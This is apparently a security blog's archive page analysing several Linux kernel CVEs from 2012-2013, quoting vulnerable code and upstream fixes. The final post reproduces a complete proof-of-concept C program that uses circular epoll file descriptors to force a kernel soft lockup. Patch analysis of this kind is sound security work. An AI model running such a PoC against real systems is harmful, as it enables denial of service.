xorl %eax, %eax

Archive for the ‘linux’ Category

CVE-2013-3228: Linux kernel IrDA Information Leak

with 2 comments

This is another simple kernel memory information leak fixed by Mathias Krauss. Here is the exact code where this bug is located in net/irda/af_irda.c code.

/*
 * Function irda_recvmsg_dgram (iocb, sock, msg, size, flags)
 *
 *    Try to receive message and copy it to user. The frame is discarded
 *    after being read, regardless of how much the user actually read
 */
static int irda_recvmsg_dgram(struct kiocb *iocb, struct socket *sock,
			      struct msghdr *msg, size_t size, int flags)
{
	struct sock *sk = sock->sk;
	struct irda_sock *self = irda_sk(sk);
	struct sk_buff *skb;
	size_t copied;
	int err;

	IRDA_DEBUG(4, "%s()\n", __func__);

	skb = skb_recv_datagram(sk, flags & ~MSG_DONTWAIT,
				flags & MSG_DONTWAIT, &err);
   ...
	skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);

	skb_free_datagram(sk, skb);
   ...
	return copied;
}

This is a command which is defined as shown below.

static const struct proto_ops irda_seqpacket_ops = {
  ...
	.recvmsg =	irda_recvmsg_dgram,
  ...
};

static const struct proto_ops irda_dgram_ops = {
  ...
	.recvmsg =	irda_recvmsg_dgram,
  ...
};

#ifdef CONFIG_IRDA_ULTRA
static const struct proto_ops irda_ultra_ops = {
  ...
	.recvmsg =	irda_recvmsg_dgram,
  ...
};
#endif /* CONFIG_IRDA_ULTRA */

As Mathias Krausse pointed out, the ‘msg_namelen’ member of the ‘msghdr’ structure remains uninitialized resulting in kernel information leak. Below is how this structure is defined in include/linux/socket.h header file.

/*
 *      As we do 4.4BSD message passing we use a 4.4BSD message passing
 *      system, not 4.3. Thus msg_accrights(len) are now missing. They
 *      belong in an obscure libc emulation or the bin.
 */
  
struct msghdr {
        void    *       msg_name;       /* Socket name                  */
        int             msg_namelen;    /* Length of name               */
        struct iovec *  msg_iov;        /* Data blocks                  */
        __kernel_size_t msg_iovlen;     /* Number of blocks             */
        void    *       msg_control;    /* Per protocol magic (eg BSD file descriptor passing) */
       __kernel_size_t msg_controllen; /* Length of cmsg list */
       unsigned int    msg_flags;
};

And the fix was to add the missing initialization.

 	IRDA_DEBUG(4, "%s()\n", __func__);
 
+	msg->msg_namelen = 0;
+
 	skb = skb_recv_datagram(sk, flags & ~MSG_DONTWAIT,
 				flags & MSG_DONTWAIT, &err);

Written by xorl

May 26, 2013 at 14:18

Posted in bugs, linux

CVE-2013-1798: Linux kernel KVM IOAPIC_REG_SELECT Invalid Memory Access

leave a comment »

This was very nice vulnerability reported by Andrew Honig of Google. The bug is triggered when a user specifies an invalid IOAPIC_REG_SELECT value which is reachable via read KVM I/O device operation as you can see below.

static int ioapic_mmio_read(struct kvm_io_device *this, gpa_t addr, int len,
			    void *val)
{
	struct kvm_ioapic *ioapic = to_ioapic(this);
	u32 result;
   ...
	switch (addr) {
	case IOAPIC_REG_SELECT:
		result = ioapic->ioregsel;
		break;

	case IOAPIC_REG_WINDOW:
		result = ioapic_read_indirect(ioapic, addr, len);
		break;
   ...
	return 0;
}
   ...
static const struct kvm_io_device_ops ioapic_mmio_ops = {
	.read     = ioapic_mmio_read,
	.write    = ioapic_mmio_write,
};

Additionally, if a user makes a read by invoking IOAPIC_REG_WINDOW it will result in calling ioapic_read_indirect(). Here is what this function does.

static unsigned long ioapic_read_indirect(struct kvm_ioapic *ioapic,
					  unsigned long addr,
					  unsigned long length)
{
	unsigned long result = 0;

	switch (ioapic->ioregsel) {
  ...
	default:
		{
			u32 redir_index = (ioapic->ioregsel - 0x10) >> 1;
			u64 redir_content;

			ASSERT(redir_index < IOAPIC_NUM_PINS);

			redir_content = ioapic->redirtbl[redir_index].bits;
			result = (ioapic->ioregsel & 0x1) ?
			    (redir_content >> 32) & 0xffffffff :
			    redir_content & 0xffffffff;
			break;
		}
	}

	return result;
}

It calculates and initializes the value of ‘redir_index’ from the user controlled ‘ioapic->ioregsel’ variable and then uses it as an index to ‘ioapic->redirtbl[]’ array. If this value is larger than IOAPIC_NUM_PINS it will result in invalid memory access. Here is how IOAPIC_NUM_PINS is defined in virt/kvm/ioapic.h header file.

#define IOAPIC_NUM_PINS  KVM_IOAPIC_NUM_PINS

And this is because it is architecture specific. For IA64 is defined in include/uapi/asm/kvm.h as 48 and for x86 in arch/x86/include/uapi/asm/kvm.h as 24. As you might have noticed there is an ASSERT() call to make this check but of course, this will only take effect in the debug builds.
The fix was to replace that ASSERT() call with a range check like this.

 			u32 redir_index = (ioapic->ioregsel - 0x10) >> 1;
 			u64 redir_content;
-			ASSERT(redir_index < IOAPIC_NUM_PINS);
+			if (redir_index < IOAPIC_NUM_PINS)
+				redir_content =
+					ioapic->redirtbl[redir_index].bits;
+			else
+				redir_content = ~0ULL;
-			redir_content = ioapic->redirtbl[redir_index].bits;
 			result = (ioapic->ioregsel & 0x1) ?
 			    (redir_content >> 32) & 0xffffffff :

Written by xorl

May 23, 2013 at 22:44

Posted in bugs, linux

CVE-2013-1796: Linux kernel KVM MSR_KVM_SYSTEM_TIME Buffer Overflow

leave a comment »

This is a really nice vulnerability killed by Andy Honig. It is particularly interesting because it allows host kernel memory corruption through guest GPA (Guest Physical Address) manipulation. If we have a look in arch/x86/kvm/x86.c we can see the following code.

int kvm_set_msr_common(struct kvm_vcpu *vcpu, struct msr_data *msr_info)
{
	bool pr = false;
	u32 msr = msr_info->index;
	u64 data = msr_info->data;

	switch (msr) {   
   ...
	case MSR_KVM_SYSTEM_TIME: {
		kvmclock_reset(vcpu);

		vcpu->arch.time = data;
		kvm_make_request(KVM_REQ_CLOCK_UPDATE, vcpu);

		/* we verify if the enable bit is set... */
		if (!(data & 1))
			break;

		/* ...but clean it before doing the actual write */
		vcpu->arch.time_offset = data & ~(PAGE_MASK | 1);

		vcpu->arch.time_page =
				gfn_to_page(vcpu->kvm, data >> PAGE_SHIFT);

		if (is_error_page(vcpu->arch.time_page))
			vcpu->arch.time_page = NULL;

		break;
	}
   ...
	return 0;
}
EXPORT_SYMBOL_GPL(kvm_set_msr_common);

So by utilizing the ‘MSR_KVM_SYSTEM_TIME’ kvmclock MSR a user can set ‘vcpu->arch.time_page’ through gfn_to_page() call that uses the user derived ‘data’ information. As Andy Honig mentioned in his commit, the arbitrary write occurs when kmap atomic attempts to obtain a pointer to the time structure page and performing a memcpy() to it starting at the user controlled offset. The fix was to add a check that verifies that the provided value does not exceed the structure’s boundaries.

 		/* ...but clean it before doing the actual write */
 		vcpu->arch.time_offset = data & ~(PAGE_MASK | 1);
+		/* Check that the address is 32-byte aligned. */
+		if (vcpu->arch.time_offset &
+				(sizeof(struct pvclock_vcpu_time_info) - 1))
+			break;
+
 		vcpu->arch.time_page =
 				gfn_to_page(vcpu->kvm, data >> PAGE_SHIFT);

Written by xorl

May 22, 2013 at 22:15

Posted in bugs, linux

CVE-2013-1848: Linux kernel EXT3 ext3_msg() Format String

leave a comment »

Recently Lars-Peter Clausen committed a change on Linux kernel that fixes a format string vulnerability in the EXT3 filesystem code. The susceptible code resides in fs/ext3/super.c but to better understand it we need to have a look on how ext3_msg() is defined first.

void ext3_msg(struct super_block *sb, const char *prefix,
                const char *fmt, ...)
{
        struct va_format vaf;
        va_list args;
 
        va_start(args, fmt);
 
        vaf.fmt = fmt;
        vaf.va = &args;
 
        printk("%sEXT3-fs (%s): %pV\n", prefix, sb->s_id, &vaf);
 
        va_end(args);
}

So, it should be called passing the following three mandatory arguments:
– Pointer to the super-block structure
– Prefix string
– Format string
And of course, any variables to be printed. As Lars-Peter Clausen noticed, there were two cases where there was no prefix defined. This makes the format string argument to be passed as prefix and any variables to be processed as the format string. Here are these two cases:

/*
 * Open the external journal device
 */
static struct block_device *ext3_blkdev_get(dev_t dev, struct super_block *sb)
{
  ...
fail:
        ext3_msg(sb, "error: failed to open journal device %s: %ld",
                __bdevname(dev, b), PTR_ERR(bdev));

        return NULL;
}

And…

static ext3_fsblk_t get_sb_block(void **data, struct super_block *sb)
{
        ext3_fsblk_t    sb_block;
  ...
        if (*options && *options != ',') {
                ext3_msg(sb, "error: invalid sb specification: %s",
                       (char *) *data);
  ...
        return sb_block;
}

The fix was to add the missing prefix argument to the function call like this.

@@ -353,7 +353,7 @@ static struct block_device *ext3_blkdev_get(dev_t dev, struct super_block *sb)
 	return bdev;
 fail:
-	ext3_msg(sb, "error: failed to open journal device %s: %ld",
+	ext3_msg(sb, KERN_ERR, "error: failed to open journal device %s: %ld",
 		__bdevname(dev, b), PTR_ERR(bdev));
 	return NULL;
@@ -887,7 +887,7 @@ static ext3_fsblk_t get_sb_block(void **data, struct super_block *sb)
 	/*todo: use simple_strtoll with >32bit ext3 */
 	sb_block = simple_strtoul(options, &options, 0);
 	if (*options && *options != ',') {
-		ext3_msg(sb, "error: invalid sb specification: %s",
+		ext3_msg(sb, KERN_ERR, "error: invalid sb specification: %s",
 		       (char *) *data);
 		return 1;
 	}

Written by xorl

May 21, 2013 at 21:15

Posted in bugs, linux

CVE-2013-1774: Linux kernel Edgeport USB Serial Converter NULL Pointer Dereference

leave a comment »

This is a vulnerability fixed by Wolfgang Frisch and the buggy code resides in drivers/usb/serial/io_ti.c as you can see below.

static void chase_port(struct edgeport_port *port, unsigned long timeout,
								int flush)
{
	int baud_rate;
	struct tty_struct *tty = tty_port_tty_get(&port->port->port);
	struct usb_serial *serial = port->port->serial;
	wait_queue_t wait;
	unsigned long flags;
   ...
	remove_wait_queue(&tty->write_wait, &wait);
   ...
	tty_kref_put(tty);
   ...
}

If the equivalent /dev/ttyUSB device file is in use while the device is disconnected then any call to chase_port() (used to chase the port, close and flush it) will lead to NULL pointer dereference since there is no longer a ‘tty’ associated with it. The fix was to add a simple check for this case.

	unsigned long flags;
+	if (!tty)
+		return;
+
	if (!timeout)

Written by xorl

May 18, 2013 at 16:14

Posted in bugs, linux

CVE-2013-1819: Linux kernel XFS _xfs_buf_find() NULL Pointer Dereference

with 2 comments

On 21 January 2013 Dave Chinner of Red Hat committed a change that fixes a NULL pointer dereference vulnerability in XFS filesystem. The below routine is located in fs/xfs/xfs_buf.c file.

/*
 *	Finding and Reading Buffers
 */

/*
 *	Look up, and creates if absent, a lockable buffer for
 *	a given range of an inode.  The buffer is returned
 *	locked.	No I/O is implied by this call.
 */
xfs_buf_t *
_xfs_buf_find(
	struct xfs_buftarg	*btp,
	struct xfs_buf_map	*map,
	int			nmaps,
	xfs_buf_flags_t		flags,
	xfs_buf_t		*new_bp)
{
	size_t			numbytes;
	struct xfs_perag	*pag;
   ...
	/* get tree root */
	pag = xfs_perag_get(btp->bt_mount,
				xfs_daddr_to_agno(btp->bt_mount, blkno));

	/* walk tree */
   ...
	return bp;
}

First of all, the xfs_addr_to_agno() C macro is the following as defined in fs/xfs/xfs_mount.h header file.

#define xfs_daddr_to_agno(mp,d) \
        ((xfs_agnumber_t)(XFS_BB_TO_FSBT(mp, d) / (mp)->m_sb.sb_agblocks))

As Dave Chinner pointed out, if we try to walk a filesystem and the extent map has corrupted block number (out of range address) the call to xfs_perag_get() above will trigger a NULL pointer dereference.

/*
 * Reference counting access wrappers to the perag structures.
 * Because we never free per-ag structures, the only thing we
 * have to protect against changes is the tree structure itself.
 */
struct xfs_perag *
xfs_perag_get(struct xfs_mount *mp, xfs_agnumber_t agno)
{
        struct xfs_perag        *pag;
        int                     ref = 0;
 
        rcu_read_lock();
        pag = radix_tree_lookup(&mp->m_perag_tree, agno);
        if (pag) {
               ASSERT(atomic_read(&pag->pag_ref) >= 0);
               ref = atomic_inc_return(&pag->pag_ref);
        }
        rcu_read_unlock();
        trace_xfs_perag_get(mp, agno, ref, _RET_IP_);
        return pag;
}

The radix_tree_lookup() call will use the invalid block number ‘agblocks’ (size of an allocation group) as an index key to the ‘mp->m_perag_tree’ radix tree.

The fix to this bug was to add a new variable to the susceptible routine:

 	xfs_buf_t		*bp;
 	xfs_daddr_t		blkno = map[0].bm_bn;
+	xfs_daddr_t		eofs;
 	int			numblks = 0;

And write a check for the block number not being larger than the end of the filesystem.

 	ASSERT(!(BBTOB(blkno) & (xfs_off_t)btp->bt_smask));
 
+	/*
+	 * Corrupted block numbers can get through to here, unfortunately, so we
+	 * have to check that the buffer falls within the filesystem bounds.
+	 */
+	eofs = XFS_FSB_TO_BB(btp->bt_mount, btp->bt_mount->m_sb.sb_dblocks);
+	if (blkno >= eofs) {
+		/*
+		 * XXX (dgc): we should really be returning EFSCORRUPTED here,
+		 * but none of the higher level infrastructure supports
+		 * returning a specific error on buffer lookup failures.
+		 */
+		xfs_alert(btp->bt_mount,
+			  "%s: Block out of range: block 0x%llx, EOFS 0x%llx ",
+			  __func__, blkno, eofs);
+		return NULL;
+	}
+
 	/* get tree root */

Written by xorl

May 18, 2013 at 16:12

Posted in bugs, linux

CVE-2012-3375: Linux kernel fs/eventpoll.c File Descriptor Leak

with one comment

This vulnerability was reported by Yurij M. Plotnikov as you can read in this email of LKML. The susceptible code resides in fs/eventpoll.c and specifically in the epoll_ctl(2) system call’s code.

/*
 * The following function implements the controller interface for
 * the eventpoll file that enables the insertion/removal/change of
 * file descriptors inside the interest set.
 */
SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd,
                struct epoll_event __user *, event)
{
        int error;
        int did_lock_epmutex = 0;
        struct file *file, *tfile;
        struct eventpoll *ep;
        struct epitem *epi;
        struct epoll_event epds;

        error = -EFAULT;
        if (ep_op_has_event(op) &&
            copy_from_user(&epds, event, sizeof(struct epoll_event)))
                goto error_return;
   ...
        if (op == EPOLL_CTL_ADD) {
                if (is_file_epoll(tfile)) {
                        error = -ELOOP;
                        if (ep_loop_check(ep, tfile) != 0)
                                goto error_tgt_fput;
                        }
                } else
                        list_add(&tfile->f_tfile_llink, &tfile_check_list);
        }
   ...
error_tgt_fput:
        if (did_lock_epmutex)
                mutex_unlock(&epmutex);

        fput(tfile);
error_fput:
        fput(file);
error_return:

        return error;
}

As you can read, if the opcode is ‘EPOLL_CTL_ADD’ it will first check if the requested file is an event by verifying its callback functions using the below routine.

static const struct file_operations eventpoll_fops;

static inline int is_file_epoll(struct file *f)
{
        return f->f_op == &eventpoll_fops;
}

However, if this check fails it will set the ‘error’ to ‘-ELOOP’ and move to the ep_loop_check() which verifies that no closed loop or deep chains will be created by adding the passed epoll file. If this fails it will jump to ‘error_tgt_fput’ to unlock and exit.
As Yurij M. Plotnikov pointed out, this code does not clear ‘tfile_check_list’ resulting in leaving open the file descriptors. The patch was to add the missing call.

 		if (is_file_epoll(tfile)) {
 			error = -ELOOP;
-			if (ep_loop_check(ep, tfile) != 0)
+			if (ep_loop_check(ep, tfile) != 0) {
+				clear_tfile_check_list();
 				goto error_tgt_fput;
+			}
 		} else

And here is the code of the missing call:

static void clear_tfile_check_list(void)
{
        struct file *file;

        /* first clear the tfile_check_list */
        while (!list_empty(&tfile_check_list)) {
                file = list_first_entry(&tfile_check_list, struct file,
                                        f_tfile_llink);
                list_del_init(&file->f_tfile_llink);
        }
        INIT_LIST_HEAD(&tfile_check_list);
}

Finally, Yurij M. Plotnikov also provided a PoC code to reproduce a kernel soft lockup. Here is this code.

#include <netinet/in.h>
#include <sys/epoll.h>
#include <errno.h>
 
int
main ()
{
    struct sockaddr_in addr;
    struct epoll_event event;
    int epfd1, epfd2, sock;
    int rc;
    int i = 0;
    while (1)
    {
        printf("ITERATION %d\n", ++i);
        epfd1 = epoll_create(1);
        printf("epoll_create() -> %d(%d)\n", epfd1, errno);
        epfd2 = epoll_create(1);
        printf("epoll_create() -> %d(%d)\n", epfd2, errno);

It enters a ‘while’ loop and opens two epoll file descriptors.

        sock = socket(PF_INET, SOCK_STREAM, 0);
        printf("socket() -> %d(%d)\n", sock, errno);
 
        addr.sin_family = AF_INET;
        addr.sin_port = 0;
        addr.sin_addr.s_addr = 0;
        rc = bind(sock, (struct sockaddr*)&addr, sizeof(addr));
        printf("bind() -> %d(%d)\n", rc, errno);
 
        rc = listen(sock, 1);
        printf("listen() -> %d(%d)\n", rc, errno);

Next, he opens a socket file descriptor and makes it passive by invoking listen(2) system call.

	event.data.fd = sock;
        event.events = 0;
        rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, sock, &event);
        printf("epoll_ctl() -> %d(%d)\n", rc, errno);

It invokes the buggy system call passing ‘epfd1′ pointing to the socket file descriptor.

	event.data.fd = epfd2;
        event.events = EPOLLIN;
        rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, epfd2, &event);
        printf("epoll_ctl() -> %d(%d)\n", rc, errno);
 
        event.data.fd = epfd1;
        event.events = EPOLLIN;
        rc = epoll_ctl(epfd2, EPOLL_CTL_ADD, epfd1, &event);
        printf("epoll_ctl() -> %d(%d)\n", rc, errno);

Then he adds the two epoll file descriptors.

        rc = close(epfd1);
        printf("close(epfd1) -> %d(%d)\n", rc, errno);
 
        rc = close(epfd2);
        printf("close(epfd2) -> %d(%d)\n", rc, errno);
 
        rc = close(sock);
        printf("close(sock) -> %d(%d)\n", rc, errno);
 
        sleep(1);
        printf("\n\n");
    }
    return 0;
}

At the end of the loop, it attempts to close all of the opened file descriptors and wait for 1 second until the next iteration.

As you can see, the last calls to epoll_ctl(2) system call were passing file descriptors which were pointing to each other. This leads to a loop resulting in reaching the vulnerable code and since the file descriptors are not properly closed, it will eventually lead to a kernel soft lockup after a couple of iterations.

Written by xorl

August 14, 2012 at 16:55

Posted in bugs, linux

Follow

Get every new post delivered to your Inbox.

Join 68 other followers